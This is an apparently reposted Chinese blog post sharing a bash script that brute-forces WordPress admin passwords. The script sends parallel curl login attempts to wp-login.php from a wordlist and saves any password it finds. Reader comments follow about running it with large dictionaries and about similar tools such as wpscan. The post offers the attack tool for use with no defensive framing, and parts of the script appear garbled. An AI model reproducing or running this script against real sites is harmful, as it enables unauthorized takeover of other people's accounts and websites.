分享一个WordPress后台密码暴力破解脚本

admin 2021年4月3日19:20:11评论537 views字数 1269阅读4分13秒阅读模式

WordPress是一种使用PHP语言开发的博客平台,用户可以在支持PHP和MySQL 数据库的服务器上架设自己的网志。也可以把 WordPress 当作一个内容管理系统(CMS)来使用。WordPress 是一个免费的开源项目,在GNU通用公共许可证下授权发布。

目前最新版本为4.0版。 WordPress 被认为是Michel Valdrighi所开发的网志平台b2/cafelog的正式继承者。

“WordPress”这个名字出自 Christine Selleck 的主意,他是主要开发者Matt Mullenweg的朋友。

本次给大家带来WordPress后台密码暴力破解程序,请先确认机器已安装curl。

#!/bin/bash
#by leo108
#使用方式:./wp-pwd.sh 用户名 字典 登录页面 线程数
#例如: ./wp-pwd.sh leo 1.txt http://xxx.com/wp-login.php 15
user=$1
zidian=$2
url=$3
thread=$4
function guess {
    curl -s -d "log=$user&pwd=$1" $url >> $1.html
    l=$(wc -l $1.html| awk -F[:" "]+ '{print $1}')
    if [ 0 -eq $l ]; then
        echo $1 >> pwd.txt
        rm $1.html
        return 1
    else
        rm $1.html
        return 0
    fi
}
if [ -e pwd.txt ]; then
    rm pwd.txt
fi
tmp_fifofile="/tmp/$$.fifo"
mkfifo $tmp_fifofile
exec 6$tmp_fifofile
rm $tmp_fifofile
for ((i=0;i&6
while read line;do
    if [ -e pwd.txt ]; then
        break
    fi
    read -u6
    {
        echo "Testing "$line
        guess $line
        echo >&6
    } &
done &-
if [ -e pwd.txt ]; then
    echo "Password is "
    cat pwd.txt
    rm pwd.txt
else
    echo "Not Found"
fi
exit 0

source

留言评论(旧系统):

佚名 @ 2013-06-10 10:03:59

哈哈。。我看到这边帖子比你早。。哈哈
哈哈

本站回复:

额、?

佚名 @ 2013-06-10 10:04:59

额。。一激动。。分开留言了。。。。

貌似还要安装curl(原内容说的)。。。

本站回复:

╮(╯_╰)╭。。。

volg.tv @ 2013-06-10 11:33:16

昨晚跑了一晚破自己的站点,速度略慢,是不是因为挂了个50G的字典问题?到现在还没破出来,密码纯英文加数字组合,怎么破!

本站回复:

so?

Fu2k @ 2013-06-10 20:13:27

这个玩意不错,不过BT5里里面也有一个和这个功能类似的。

本站回复:

╮(╯_╰)╭

佚名 @ 2013-06-13 11:27:18

一直都用bt5里面的wpscan。。。不过从来没跑出密码来

本站回复:

╮(╯_╰)╭

文章来源于lcx.cc:分享一个WordPress后台密码暴力破解脚本

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月3日19:20:11
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   分享一个WordPress后台密码暴力破解脚本http://cn-sec.com/archives/321521.html

发表评论

匿名网友 填写信息